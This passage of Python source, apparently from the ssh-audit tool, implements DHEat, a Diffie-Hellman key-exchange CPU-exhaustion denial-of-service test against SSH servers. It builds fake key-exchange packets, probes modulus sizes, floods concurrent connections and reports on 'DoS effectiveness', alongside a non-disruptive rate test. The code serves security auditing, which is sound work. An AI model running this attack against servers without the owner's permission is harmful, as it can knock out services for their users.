        "diffie-hellman-group15-sha256@ssh.com": 3072,
        "diffie-hellman-group15-sha384@ssh.com": 3072,
        "diffie-hellman-group15-sha512": 3072,
        "diffie-hellman-group14-sha256": 2048,
        "diffie-hellman-group14-sha1": 2048,
        "diffie-hellman-group14-sha224@ssh.com": 2048,
        "diffie-hellman-group14-sha256@ssh.com": 2048,
        "diffie-hellman-group1-sha1": 1024,
        "diffie-hellman-group1-sha256": 1024,
        "curve25519-sha256": (31 * 8),
        "curve25519-sha256@libssh.org": (31 * 8),
        "ecdh-sha2-nistp256": (64 * 8),
        "ecdh-sha2-nistp384": (96 * 8),
        "ecdh-sha2-nistp521": (132 * 8),
        "sntrup761x25519-sha512@openssh.com": (1189 * 8),
    }

    # List of DH algorithms that have been validated by the maintainer.  There is quite the long list of DH algorithms available (see above), and testing them all would require a lot of time as many are not implemented in OpenSSH.  So perhaps the community can help with testing...
    tested_algs = ["diffie-hellman-group18-sha512", "diffie-hellman-group16-sha512", "diffie-hellman-group-exchange-sha256", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "curve25519-sha256", "curve25519-sha256@libssh.org", "sntrup761x25519-sha512@openssh.com"]

    # If a DH algorithm is used that is not in the tested_algs list, above, then write this notice to the user.
    untested_alg_notice = "{color_start:s}NOTE:{color_end:s} the target DH algorithm ({dh_alg:s}) has not been tested by the maintainer.  If you can verify that the server's CPU is fully utilized, please copy/paste this output to jtesta@positronsecurity.com."

    # Hardcoded ECDH ephemeral public keys for NIST-P256, NIST-P384, and NIST-P521.  These need to lie on the ellipical curve in order to be accepted by the server, so generating them quickly isn't easy without an external crypto library.  So we'll just use some hardcoded ones.
    HARDCODED_NISTP256 = b"\x04\x9d\x32\xad\x75\x68\xc3\x43\x30\x12\x1b\x64\x5d\x12\x3e\x18\x7b\xd2\x5a\xd6\x42\x6b\xb5\xab\xa3\x16\xda\x64\xe7\x15\x22\xd2\x66\xae\xcb\xcc\x9c\x64\x57\x32\x76\x41\x74\xeb\xff\xda\x28\xd6\x6e\x10\x98\x60\x56\x74\x30\x37\x97\xd2\x7f\x29\xd9\x99\xf1\x58\x8a"
    HARDCODED_NISTP384 = b"\x04\x94\xd9\xd2\x49\xac\xb6\x23\x59\x47\x32\x50\x5f\xaf\x55\x6e\x7a\x4a\x00\x82\xd9\xb1\x4c\xe4\x61\x05\x70\x91\x99\x19\xbe\x84\x2d\x3a\x74\x7c\xd8\xd1\xc1\x1a\x5c\xbf\xd3\x33\xcb\x25\x51\x1c\x66\x76\x53\x04\x92\x4f\xb3\x1f\x9b\x19\xba\x6b\x1a\xe2\x91\x04\xc6\x4c\x9c\xec\xa9\x43\xd0\x2e\x08\x4b\x2a\x50\xcf\x31\x46\xb3\x6c\x29\xd0\xf1\x26\x9e\x57\x17\xe1\xf8\x29\xce\xb5\x9a\x96\x2b\x94"
    HARDCODED_NISTP521 = b"\x04\x00\x51\xb7\xf4\x51\x54\x7c\x60\xd9\xe8\x90\x8f\x40\xcd\x05\x7e\x75\xcf\xfc\x3b\xe8\xa6\x45\x8b\xe3\xb5\x99\x75\xf6\x42\xef\x34\x5a\x9a\x86\x90\x43\x52\x62\x49\xd9\x62\x50\xc0\xb7\xdd\xe0\x34\x2e\x25\x3f\x3e\x1f\x19\xdd\xf5\xc9\x11\xe4\x6f\xd0\xe2\x59\x86\xc3\x7b\x01\xd3\xf7\x5a\x28\x72\x73\x3c\x7e\x4d\x8f\x08\x2a\x70\x94\x93\x83\xe2\xed\xf2\xd6\xf6\x3e\x63\xb8\xb9\xaa\x83\x2a\xd3\x96\xca\xde\x38\x62\x19\x1e\x84\x84\xad\xfe\x06\xfc\x2b\xb2\x1b\x79\x63\xfc\x1e\x6d\x85\x14\xba\x3c\x64\xd9\x64\x75\xd5\x74\xcb\x5b\x3d\xc3\x9f"

    # Algorithms that must use hard-coded e values.
    HARDCODED_ALGS = ["ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521"]

    # Post-quantum algorithms matched with traditional crypto.
    COMPLEX_PQ_ALGS = ["sntrup761x25519-sha512@openssh.com"]

    CLEAR = ""
    BLUEB = ""
    GREENB = ""
    PURPLEB = ""
    REDB = ""
    WHITEB = ""
    YELLOWB = ""
    BAR_CHART = " "
    CHART_UPWARDS = " "

    def __init__(self, out: 'OutputBuffer', aconf: 'AuditConf', banner: Optional['Banner'], kex: 'SSH2_Kex') -> None:
        self.out = out
        self.target = aconf.host
        self.port = aconf.port

        # We'll use the server's banner as our own.  Otherwise, use ssh-audit's default.
        self.banner = SSH_HEADER.format("2.0").encode("utf-8") + b"\r\n"
        if banner is not None:
            self.banner = str(banner).encode("utf-8") + b"\r\n"

        # The SSH2_Kex object that we recieved from the server in a prior connection.  We'll use it as a template to craft our own kex.
        self.kex = kex

        # Resolve the target to an IP address depending on the user preferences (IPv4 or IPv6).
        self.debug("Resolving target %s..." % self.target)
        self.target_address_family, self.target_ip_address = DHEat._resolve_hostname(self.target, aconf.ip_version_preference)
        self.debug("Resolved %s to %s (address family %u)" % (self.target, self.target_ip_address, self.target_address_family))

        # The connection and read timeouts.
        self.connect_timeout = aconf.timeout
        self.read_timeout = aconf.timeout

        # True when we are in debug mode.
        self.debug_mode = aconf.debug

        # The length of our fake e value to give to the server.  It is automatically set based on the DH modulus size we are targeting, or by the user for advanced testing.
        self.e_rand_len = 0

        # The SSH Key Exchange Init message.  This is the same for each connection (minus the random 16-byte cookie field, so it will be pre-computed to save time.
        self.kex_init_body = b''

        # Disable buffered output.
        self.out.buffer_output = False

        # We'll use a weak/fast PRNG to generate the most significant byte of our fake e response to the server.
        random.seed()

        # Attack statistics.
        self.num_attempted_tcp_connections = 0
        self.num_successful_tcp_connections = 0
        self.num_successful_dh_kex = 0
        self.num_failed_dh_kex = 0
        self.num_bytes_written = 0
        self.num_connect_timeouts = 0
        self.num_read_timeouts = 0
        self.num_socket_exceptions = 0
        self.num_openssh_throttled_connections = 0

        # The time we started the attack.
        self.start_timer = 0.0

        # The number of concurrent sockets to open with the server.
        self.concurrent_connections = 10

        # The key exchange algorithm name that we are targeting on the server.  If empty, we will choose the best available option.  Otherwise, it is set by the user.
        self.target_kex = ""

        self.user_set_e_len = False
        self.send_all_packets_at_once = False
        if aconf.dheat is not None:
            self.concurrent_connections = aconf.dheat_concurrent_connections
            self.target_kex = aconf.dheat_target_alg

            # If the user specified a length of e to use instead of the correct length determined at run-time.
            if aconf.dheat_e_length > 0:
                self.send_all_packets_at_once = True  # If the user specified the e length (which is non-standard), we'll also send all SSH packets at once to reduce latency (which is also non-standard).  This involves sending the banner, KEX INIT, DH KEX INIT all in the same packet without waiting for the server to respond to them individually.
                self.user_set_e_len = True
                self.e_rand_len = aconf.dheat_e_length

        # User wants to perform a rate test.
        self.rate_test = False
        self.target_rate = 0  # When performing a rate test, this is the number of successful connections per second we are targeting.  0=no rate limit.
        if aconf.conn_rate_test_enabled:
            self.rate_test = True
            self.concurrent_connections = aconf.conn_rate_test_threads
            self.target_rate = aconf.conn_rate_test_target_rate

        # Set the color flags & emjojis, if applicable.
        if aconf.colors:
            DHEat.CLEAR = "\033[0m"
            DHEat.WHITEB = "\033[1;97m"
            DHEat.BLUEB = "\033[1;94m"    # Blue + bold
            DHEat.PURPLEB = "\033[1;95m"  # Purple + bold
            DHEat.YELLOWB = "\033[1;93m"  # Yellow + bold
            DHEat.GREENB = "\033[1;92m"   # Green + bold
            DHEat.REDB = "\033[1;91m"     # Red + bold
            DHEat.BAR_CHART = "\U0001F4CA"  # The bar chart emoji.
            DHEat.CHART_UPWARDS = "\U0001F4C8"  # The upwards chart emoji.


    @staticmethod
    def add_byte_units(n: float) -> str:
        '''Converts a number of bytes to a human-readable representation (i.e.: 10000 -> "9.8KB").'''

        if n >= 1073741824:
            return "%.1fGB" % (n / 1073741824)
        if n >= 1048576:
            return "%.1fMB" % (n / 1048576)
        if n >= 1024:
            return "%.1fKB" % (n / 1024)

        return "%u bytes" % n


    def analyze_gex(self, server_gex_alg: str) -> int:
        '''Analyzes a server's Diffie-Hellman group exchange algorithm.  The largest modulus it supports is determined, then it is inserted into DHEat.alg_priority list while maintaining order by largest modulus.  The largest modulus is also returned.'''

        self.output("Analyzing server's group exchange algorithm, %s, to find largest modulus it supports..." % (server_gex_alg))

        largest_bit_modulus = 0
        try:
            largest_bit_modulus = self.get_largest_gex_modulus(server_gex_alg)
        except Exception:
            # On exception, simply print the stack trace and continue on.
            traceback.print_exc()

        if largest_bit_modulus > 0:
            DHEat.alg_modulus_sizes[server_gex_alg] = largest_bit_modulus
            self.debug("GEX algorithm [%s] supports a max modulus of %u bits." % (server_gex_alg, largest_bit_modulus))

            # Now that we have the largest modulus for this GEX, insert it into the prioritized list of algorithms.  If, say, there are three 8192-bit kex algorithms in the list, we'll insert it as the 4th entry, as plain KEX algorithms require less network activity to trigger than GEX.
            i = 0
            inserted = False
            while i < len(DHEat.alg_priority):
                prioritized_alg = DHEat.alg_priority[i]
                prioritized_alg_size = DHEat.alg_modulus_sizes[prioritized_alg]
                if largest_bit_modulus > prioritized_alg_size + 1:  # + 1 to ensure algs with equal number of bits keep priority over this GEX.
                    DHEat.alg_priority.insert(i, server_gex_alg)
                    inserted = True
                    self.debug("Inserted %s into prioritized algorithm list at index %u: [%s]" % (server_gex_alg, i, ", ".join(DHEat.alg_priority)))
                    break

                i += 1

            # Handle the case where all existing algs have a larger modulus.
            if inserted is False:
                DHEat.alg_priority.append(server_gex_alg)
                self.debug("Appended %s to end of prioritized algorithm list: [%s]" % (server_gex_alg, ", ".join(DHEat.alg_priority)))

        self.output("The largest modulus supported by %s appears to be %u." % (server_gex_alg, largest_bit_modulus))
        return largest_bit_modulus


    def debug(self, s: str) -> None:
        '''Prints a string to the console when debugging mode is enabled.'''

        self.out.d(s)


    @staticmethod
    def dh_rate_test(out: 'OutputBuffer', aconf: 'AuditConf', kex: 'SSH2_Kex', max_time: float, max_connections: int, concurrent_sockets: int) -> str:
        '''Attempts to quickly create many sockets to the target server.  This simulates the DHEat attack without causing an actual DoS condition.  If a rate greater than MAX_SAFE_RATE is allowed, then a warning string is returned.'''

        # Gracefully handle when the user presses CTRL-C to break the interactive rate test.
        ret = ""
        try:
            ret = DHEat._dh_rate_test(out, aconf, kex, max_time, max_connections, concurrent_sockets)
        except KeyboardInterrupt:
            print()

        return ret


    @staticmethod
    def _dh_rate_test(out: 'OutputBuffer', aconf: 'AuditConf', kex: 'SSH2_Kex', max_time: float, max_connections: int, concurrent_sockets: int) -> str:
        '''Attempts to quickly create many sockets to the target server.  This simulates the DHEat attack without causing an actual DoS condition.  If a rate greater than MAX_SAFE_RATE is allowed, then a warning string is returned.'''

        def _close_socket(socket_dict: Dict[socket.socket, float], s: socket.socket) -> None:
            try:
                s.shutdown(socket.SHUT_RDWR)
                s.close()
            except OSError:
                pass

            del socket_dict[s]

        # Resolve the target into an IP address
        out.d("Resolving target %s..." % aconf.host)
        target_address_family, target_ip_address = DHEat._resolve_hostname(aconf.host, aconf.ip_version_preference)
        out.d("Resolved %s to %s (address family %u)" % (aconf.host, target_ip_address, target_address_family))

        spinner = ["-", "\\", "|", "/"]
        spinner_index = 0

        # If the user passed --conn-rate-test, then we'll perform an interactive rate test against the target.
        interactive = False
        multiline_output = False
        if aconf.conn_rate_test_enabled:
            interactive = True
            max_connections = 999999999999999999
            concurrent_sockets = aconf.conn_rate_test_threads

            DHEat.CLEAR = "\033[0m"
            DHEat.WHITEB = "\033[1;97m"
            DHEat.BLUEB = "\033[1;94m"

            # Enable multi-line output only if we're running in the Bash shell.  This might work in other shells, too, but they are untested.
            shell = os.getenv("SHELL", default="")
            if shell.endswith("/bash") or shell == "bash":
                multiline_output = True

            rate_str = ""
            if aconf.conn_rate_test_target_rate > 0:
                rate_str = " at a max rate of %s%u%s connections per second" % (DHEat.WHITEB, aconf.conn_rate_test_target_rate, DHEat.CLEAR)

            print()
            print("Performing non-disruptive rate test against %s[%s]:%u%s with %s%u%s concurrent sockets%s.  No Diffie-Hellman requests will be sent." % (DHEat.WHITEB, target_ip_address, aconf.port, DHEat.CLEAR, DHEat.WHITEB, concurrent_sockets, DHEat.CLEAR, rate_str))
            print()

            # Make room for the multi-line output.
            if multiline_output:
                print("\n\n\n\n")

        else:  # We'll do a non-interactive test as part of a standard audit.
            # Ensure that the server supports at least one DH algorithm.  Otherwise, this test is pointless.
            server_dh_kex = []
            for server_kex in kex.kex_algorithms:
                if (server_kex in DHEat.alg_priority) or (server_kex in DHEat.gex_algs):
                    server_dh_kex.append(server_kex)

            if len(server_dh_kex) == 0:
                out.d("Skipping DHEat.dh_rate_test() since server does not support any DH algorithms: [%s]" % ", ".join(kex.kex_algorithms))
                return ""
            else:
                out.d("DHEat.dh_rate_test(): starting test; parameters: %f seconds, %u max connections, %u concurrent sockets." % (max_time, max_connections, concurrent_sockets), write_now=True)

        num_attempted_connections = 0
        num_opened_connections = 0
        num_exceeded_maxstartups = 0
        socket_dict: Dict[socket.socket, float] = {}
        start_timer = time.time()
        now = start_timer
        last_update = start_timer
        while True:
            now = time.time()

            # During non-interactive tests, limit based on time and number of connections.  Otherwise, we loop indefinitely until the user presses CTRL-C.
            if (interactive is False) and ((now - start_timer) >= max_time) or (num_opened_connections >= max_connections):
                break

            # out.d("interactive: %r; time.time() - start_timer: %f; max_time: %f; num_opened_connections: %u; max_connections: %u" % (interactive, time.time() - start_timer, max_time, num_opened_connections, max_connections), write_now=True)

            # Give the user some interactive feedback.
            if interactive:
                if (now - last_update) >= 1.0:
                    seconds_running = now - start_timer
                    if multiline_output:
                        print("\033[5ARun time: %s%.1f%s seconds" % (DHEat.WHITEB, seconds_running, DHEat.CLEAR))
                        print("TCP SYNs: %s%u%s (total); %s%.1f%s (per second)" % (DHEat.WHITEB, num_attempted_connections, DHEat.CLEAR, DHEat.BLUEB, num_attempted_connections / seconds_running, DHEat.CLEAR))
                        print("Completed connections: %s%u%s (total); %s%.1f%s (per second)" % (DHEat.WHITEB, num_opened_connections, DHEat.CLEAR, DHEat.BLUEB, num_opened_connections / seconds_running, DHEat.CLEAR))
                        print("\"Exceeded MaxStartups\" responses: %s%u%s (total); %s%.1f%s (per second)" % (DHEat.WHITEB, num_exceeded_maxstartups, DHEat.CLEAR, DHEat.BLUEB, num_exceeded_maxstartups / seconds_running, DHEat.CLEAR))
                        print("%s%s%s" % (DHEat.WHITEB, spinner[spinner_index], DHEat.CLEAR))
                    else:
                        print("%s%s%s Run time: %s%.1f%s; TCP SYNs: %s%u%s; Compl. conns: %s%u%s; TCP SYNs/sec: %s%.1f%s; Compl. conns/sec: %s%.1f%s    \r" % (DHEat.WHITEB, spinner[spinner_index], DHEat.CLEAR, DHEat.WHITEB, seconds_running, DHEat.CLEAR, DHEat.WHITEB, num_attempted_connections, DHEat.CLEAR, DHEat.WHITEB, num_opened_connections, DHEat.CLEAR, DHEat.BLUEB, num_attempted_connections / seconds_running, DHEat.CLEAR, DHEat.BLUEB, num_opened_connections / seconds_running, DHEat.CLEAR), end="")
                    last_update = now
                    spinner_index = (spinner_index + 1) % 4

                # If a max rate per second was specified, calculate the amount of time to sleep so we don't exceed it.
                if aconf.conn_rate_test_target_rate > 0:
                    time_so_far = now - start_timer
                    current_rate = num_opened_connections / time_so_far
                    if current_rate > aconf.conn_rate_test_target_rate:
                        sleep_time = num_opened_connections / (aconf.conn_rate_test_target_rate * time_so_far)
                        if sleep_time > 0.0:
                            time.sleep(sleep_time)

            # Check our sockets to see if they've existed for more than 30 seconds.  If so, close them so new ones can be re-opened in their place.
            timedout_sockets = []
            for s, create_time in socket_dict.items():
                if (now - create_time) > 30:
                    timedout_sockets.append(s)  # We shouldn't modify the dictionary while iterating over it, so add it to a separate list.

            # Now we can safely close the timed-out sockets.
            while True:
                if len(timedout_sockets) == 0:  # Ensure that len() is called in every iteration by putting it here instead of the while clause.
                    break

                out.d("Closing timed-out socket.", write_now=True)
                _close_socket(socket_dict, timedout_sockets[0])
                del timedout_sockets[0]

            # Open new sockets until we've hit the number of concurrent sockets, or if we exceeded the number of maximum connections.
            while (len(socket_dict) < concurrent_sockets) and (len(socket_dict) + num_opened_connections < max_connections):
                s = socket.socket(target_address_family, socket.SOCK_STREAM)
                s.setblocking(False)

                # out.d("Creating socket (%u of %u already exist)..." % (len(socket_dict), concurrent_sockets), write_now=True)
                ret = s.connect_ex((target_ip_address, aconf.port))
                num_attempted_connections += 1
                if ret in [0, errno.EINPROGRESS, errno.EWOULDBLOCK]:
                    socket_dict[s] = now
                else:
                    out.d("connect_ex() returned: %s (%d)" % (os.strerror(ret), ret), write_now=True)

            # out.d("Calling select() on %u sockets..." % len(socket_dict), write_now=True)
            socket_list: List[socket.socket] = [*socket_dict]  # Get a list of sockets from the dictionary.
            rlist, _, elist = select.select(socket_list, [], socket_list, 0.1)

            # For each socket that has something for us to read...
            for s in rlist:
                # out.d("Socket in read list.", write_now=True)
                buf = b''
                try:
                    buf = s.recv(8)
                    # out.d("Banner: %r" % buf, write_now=True)
                except (ConnectionRefusedError, ConnectionResetError, BrokenPipeError, TimeoutError):
                    out.d("Socket error.", write_now=True)
                    _close_socket(socket_dict, s)
                    continue

                # If we received the SSH header, we'll count this as an opened connection.
                if buf.startswith(b"SSH-"):
                    num_opened_connections += 1
                    # out.d("Number of opened connections: %u (max: %u)." % (num_opened_connections, max_connections))
                elif buf == b"Exceeded":
                    num_exceeded_maxstartups += 1
                    # out.d("Number of \"Exceeded MaxStartups\": %u" % num_exceeded_maxstartups)

                _close_socket(socket_dict, s)

                # Since we just closed the socket, ensure its not in the exception list.
                if s in elist:
                    elist.remove(s)

            # Close all sockets that are in the exception state.
            for s in elist:
                # out.d("Socket in exception list.", write_now=True)
                _close_socket(socket_dict, s)

        # Close any remaining sockets.
        while True:
            if len(socket_dict) == 0:  # Ensure that len() is called in every iteration by putting it here instead of the while clause.
                break

            _close_socket(socket_dict, [*socket_dict][0])  # Close & remove the first socket we find.

        time_elapsed = time.time() - start_timer
        out.d("DHEat.dh_rate_test() results: time elapsed: %f; connections created: %u" % (time_elapsed, num_opened_connections), write_now=True)

        note = ""
        rate = 0.0
        if time_elapsed > 0.0 and num_opened_connections > 0:
            rate = num_opened_connections / time_elapsed
            out.d("DHEat.dh_rate_test() results: %.1f connections opened per second." % rate, write_now=True)

            # If we were able to open connections at a rate greater than 25 per second, then we need to warn the user.
            if rate > DHEat.MAX_SAFE_RATE:
                note = DHEat.DHEAT_WARNING.format(connections=num_opened_connections, time_elapsed=time_elapsed, rate=rate, max_safe_rate=DHEat.MAX_SAFE_RATE)

        return note


    def generate_kex(self, chosen_kex_alg: str) -> None:
        '''Generates and sets the Key Exchange Init message we'll send to the server on each connection.'''

        # The kex template we use is the server's own kex returned from an initial connection.  We'll only specify the first algorithm in each field for efficiency, since the server already told us it supports them.
        wbuf = WriteBuf()
        wbuf.write_list([chosen_kex_alg])
        wbuf.write_list([self.kex.key_algorithms[0]] if len(self.kex.key_algorithms) > 0 else [])
        wbuf.write_list([self.kex.client.encryption[0]] if len(self.kex.client.encryption) > 0 else [])
        wbuf.write_list([self.kex.server.encryption[0]] if len(self.kex.server.encryption) > 0 else [])
        wbuf.write_list([self.kex.client.mac[0]] if len(self.kex.client.mac) > 0 else [])
        wbuf.write_list([self.kex.server.mac[0]] if len(self.kex.server.mac) > 0 else [])
        wbuf.write_list([self.kex.client.compression[0]] if len(self.kex.client.compression) > 0 else [])
        wbuf.write_list([self.kex.server.compression[0]] if len(self.kex.server.compression) > 0 else [])
        wbuf.write_list([self.kex.client.languages[0]] if len(self.kex.client.languages) > 0 else [])
        wbuf.write_list([self.kex.server.languages[0]] if len(self.kex.server.languages) > 0 else [])
        wbuf.write_bool(self.kex.follows)
        wbuf.write_int(self.kex.unused)
        self.kex_init_body = wbuf.write_flush()


    def get_largest_gex_modulus(self, server_gex_alg: str) -> int:
        '''Probes the server for the largest modulus size it supports through group-exchange algorithms.'''

        self.debug("Called get_largest_gex_modulus(%s)." % server_gex_alg)

        ssh_socket = SSH_Socket(self.out, self.target, self.port, timeout=self.connect_timeout, timeout_set=True)
        new_kex = SSH2_Kex(self.out, self.kex.cookie, [server_gex_alg], self.kex.key_algorithms, self.kex.client, self.kex.server, False, unused=0)

        # First, let's try a range of ridiculously large bits.  This is unlikely to work, but it would make things very interesting if they did!
        ret: Dict[str, List[int]] = {}
        if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, 9216, 12288, 16384, ret) == exitcodes.GOOD and server_gex_alg in ret:

            # Check that what the server accepted lies within the range we requested.
            accepted_bits = ret[server_gex_alg][0]
            if accepted_bits >= 9216:
                self.debug("get_largest_gex_modulus(%s) returning %u." % (server_gex_alg, accepted_bits))
                ssh_socket.close()
                return accepted_bits
            else:
                self.debug("get_largest_gex_modulus(%s): received smaller bits (%u) than requested (9216 - 16384); continuing..." % (server_gex_alg, accepted_bits))

        # Check the largest bit sizes first, and stop the moment we find something the server supports.
        for bits in [8192, 7680, 6144, 4096, 3072, 2048, 1024]:
            ret.clear()
            if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, bits, bits, bits, ret) == exitcodes.GOOD and server_gex_alg in ret:

                # Check that what the server accepted lies within the range we requested.
                accepted_bits = ret[server_gex_alg][0]
                if accepted_bits == bits:
                    self.debug("get_largest_gex_modulus(%s) returning %u." % (server_gex_alg, accepted_bits))
                    ssh_socket.close()
                    return accepted_bits
                self.debug("get_largest_gex_modulus(%s): received smaller bits (%u) than requested (%u); continuing..." % (server_gex_alg, accepted_bits, bits))

        # Our standard bit sizes failed above, so let's try a range from 1024 - 8192 as a last attempt...
        ret.clear()
        if GEXTest.granular_modulus_size_test(self.out, ssh_socket, new_kex, 1024, 4096, 8192, ret) == exitcodes.GOOD and server_gex_alg in ret:
            accepted_bits = ret[server_gex_alg][0]
            self.debug("get_largest_gex_modulus(%s) returning %u." % (server_gex_alg, accepted_bits))
            ssh_socket.close()
            return accepted_bits

        # Total failure.  :(
        return 0


    def get_padding(self, payload: bytes) -> Tuple[int, bytes]:
        '''Given a payload, returns the padding length and the padding.'''

        pad_len = -(len(payload) + 5) % 8
        if pad_len < 4:
            pad_len += 8
        padding = b"\x00" * pad_len

        return pad_len, padding


    def make_dh_kexinit(self, chosen_alg: str, gex_msb: int = -1) -> bytes:
        '''Makes a Diffie-Hellman Key Exchange Init packet.  Instead of calculating a real value for e, a random value less than p - 1 is constructed.'''

        # Start with a zero-byte to signify that this is not a negative number.  The second byte must be 0xfe or smaller so as to ensure that our value of e < p - 1 (otherwise the server will reject it).  All bytes thereafter can be random.

        message_code = b'\x1e'  # Diffie-Hellman Key Exchange Init (30)
        max_msb = 254  # The most significant byte for KEX must be between 0x00 and 0xFE (inclusive).
        if gex_msb != -1:
            message_code = b'\x20'  # Diffie-Hellman Group Exchange Init (32)
            max_msb = gex_msb - 1  # During the GEX negotiation, the server returned a custom p value.  Subtracting by 1 ensures e < p - 1.

        if chosen_alg == "ecdh-sha2-nistp256":
            e = DHEat.HARDCODED_NISTP256
        elif chosen_alg == "ecdh-sha2-nistp384":
            e = DHEat.HARDCODED_NISTP384
        elif chosen_alg == "ecdh-sha2-nistp521":
            e = DHEat.HARDCODED_NISTP521
        else:
            e = b"\x00" + int.to_bytes(random.randint(0, max_msb), length=1, byteorder="big") + os.urandom(self.e_rand_len)

        payload = message_code + struct.pack("!L", len(e)) + e
        pad_len, padding = self.get_padding(payload)

        return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding


    def make_gex_request(self, gex_modulus_size: int) -> bytes:
        '''Creates a Diffie-Hellman Group Exchange Request packet.'''

        # Message code = 0x22 = Diffie-Hellman Group Exchange Request (34).
        payload = b'\x22' + struct.pack("!LLL", gex_modulus_size, gex_modulus_size, gex_modulus_size)
        pad_len, padding = self.get_padding(payload)

        return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding


    def make_kexinit(self) -> bytes:
        '''Creates a complete Key Exchange Init packet, which contains the kex algorithm we're targeting, host keys & ciphers we support, etc.  The algorithms we claim to support is really the list that the server gave to us in order to guarantee that it will accept our message.'''

        # Message code = 0x14 = Key Exchange Init (20).
        payload = b'\x14' + os.urandom(16) + self.kex_init_body
        pad_len, padding = self.get_padding(payload)

        return struct.pack("!LB", len(payload) + pad_len + 1, pad_len) + payload + padding


    def output(self, s: str = "") -> None:
        self.out.info(s)


    def read_banner(self, s: socket.socket) -> Tuple[bytes, bytes]:
        '''Returns the server's banner.  Optionally returns extra bytes that came after the banner.'''

        read_buffer = b''
        newline_pos = -1
        timer = time.time()
        while newline_pos == -1:
            if (time.time() - timer) >= self.read_timeout:
                return b'', b''

            buf = b''
            try:
                buf = s.recv(32)
            except ConnectionResetError:
                return b'', b''
            except socket.timeout:
                return b'', b''

            if len(buf) == 0:
                return b'', b''

            read_buffer += buf
            newline_pos = read_buffer.find(b"\r\n")

        extra = b''
        if len(read_buffer) > newline_pos + 2:
            extra = read_buffer[newline_pos + 2:]

        return read_buffer[0:newline_pos], extra


    def read_ssh_packet(self, s: socket.socket, extra: bytes = b'') -> Tuple[int, int]:
        '''Reads an SSH packet and returns its message code.  When Diffie-Hellman Key Exchange Reply (31) packets are read, the most-significant byte of the GEX p-value is also returned.'''

        extra_len = len(extra)
        buf = b''
        if extra_len < 5:
            # self.debug("Obtaining lengths by reading %u bytes." % (5 - extra_len))
            buf = s.recv(5 - extra_len)
            if len(buf) == 0:
                return -1, -1

            buf = extra + buf
            extra = b''
            extra_len = 0
        else:
            buf = extra[0:5]
            extra = extra[5:]
            extra_len = len(extra)

        # self.debug("Unpacking lengths: %s" % buf)
        packet_len, padding_len = struct.unpack("!LB", buf)  # pylint: disable=unused-variable
        # self.debug("Packet len: %u; padding len: %u" % (packet_len, padding_len))

        packet_len -= 1
        buf = extra + s.recv(packet_len - extra_len)
        if buf == b"":
            return -1, -1

        message_code = buf[0]

        # If this is a Diffie-Hellman Key Exchange Reply (31), then obtain the most-significant byte of the p-value returned.
        gex_msb = -1
        if message_code == 31 and len(buf) > 6:
            gex_msb = buf[5] if buf[5] != 0 else buf[6]

        return message_code, gex_msb


    def run(self) -> None:
        '''Main entrypoint for testing the server.'''


        self.start_timer = time.time()

        # Run against the server until the user presses CTRL-C, then dump statistics.
        success = True
        try:
            success = self._run()
        except KeyboardInterrupt:
            pass

        # Don't print statistics if it failed to run.
        if not success:
            return

        # Print extensive statistics on what just happened.
        seconds_running = time.time() - self.start_timer
        print("\n\n")
        print("                        %s %sSTATISTICS%s %s" % (self.BAR_CHART, self.WHITEB, self.CLEAR, self.CHART_UPWARDS))
        print("                           %s----------%s" % (self.WHITEB, self.CLEAR))
        print()
        print("                       Run time: %s%.1f seconds%s" % (self.WHITEB, seconds_running, self.CLEAR))
        print()
        print("      Attempted TCP connections: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_attempted_tcp_connections / seconds_running, self.num_attempted_tcp_connections, self.CLEAR))
        print("     Successful TCP connections: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_successful_tcp_connections / seconds_running, self.num_successful_tcp_connections, self.CLEAR))
        print()
        print("                  Bytes written: %s%s/sec, %s total%s" % (self.WHITEB, DHEat.add_byte_units(self.num_bytes_written / seconds_running), DHEat.add_byte_units(self.num_bytes_written), self.CLEAR))
        print()
        print("      Successful DH KEX replies: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_successful_dh_kex / seconds_running, self.num_successful_dh_kex, self.CLEAR))
        print("      Unexpected DH KEX replies: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_failed_dh_kex / seconds_running, self.num_failed_dh_kex, self.CLEAR))
        print("\"Exceeded MaxStartups\" replies*: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_openssh_throttled_connections / seconds_running, self.num_openssh_throttled_connections, self.CLEAR))
        print()
        print("            Connection timeouts: %s%.1f/sec, %u total%s (timeout setting: %.1f sec)" % (self.WHITEB, self.num_connect_timeouts / seconds_running, self.num_connect_timeouts, self.CLEAR, self.connect_timeout))
        print("                  Read timeouts: %s%.1f/sec, %u total%s (timeout setting: %.1f sec)" % (self.WHITEB, self.num_read_timeouts / seconds_running, self.num_read_timeouts, self.CLEAR, self.read_timeout))
        print("              Socket exceptions: %s%.1f/sec, %u total%s" % (self.WHITEB, self.num_socket_exceptions / seconds_running, self.num_socket_exceptions, self.CLEAR))
        print()

        if seconds_running < 5.0:
            print("%sTotal run time was under 5 seconds; try running it for longer to get more accurate analysis.%s" % (DHEat.YELLOWB, DHEat.CLEAR))
        elif self.num_successful_tcp_connections / seconds_running < DHEat.MAX_SAFE_RATE:
            print("Because the number of successful TCP connections per second (%.1f) is less than %.1f, it appears that the target %sis using rate limiting%s to prevent CPU exaustion." % (self.num_successful_tcp_connections / seconds_running, DHEat.MAX_SAFE_RATE, DHEat.GREENB, DHEat.CLEAR))
        else:
            print("Because the number of successful TCP connections per second (%.1f) is greater than %.1f, it appears that the target %sis NOT using rate limiting%s to prevent CPU exaustion." % (self.num_successful_tcp_connections / seconds_running, DHEat.MAX_SAFE_RATE, DHEat.REDB, DHEat.CLEAR))

        print()
        print()
        print(" * OpenSSH has a throttling mechanism (controlled by the MaxStartups directive) to prevent too many pre-authentication connections from overwhelming the server.  When triggered, the server will probabilistically return \"Exceeded MaxStartups\" instead of the usual SSH banner, then terminate the connection.  In order to maximize the DoS effectiveness, this metric should be greater than zero, though the ideal rate of rejections depends on the target server's CPU resources.")
        print()


    @staticmethod
    def _resolve_hostname(host: str, ip_version_preference: List[int]) -> Tuple[int, str]:
        '''Resolves a hostname to its IPv4 or IPv6 address, depending on user preference.'''

        family = socket.AF_UNSPEC
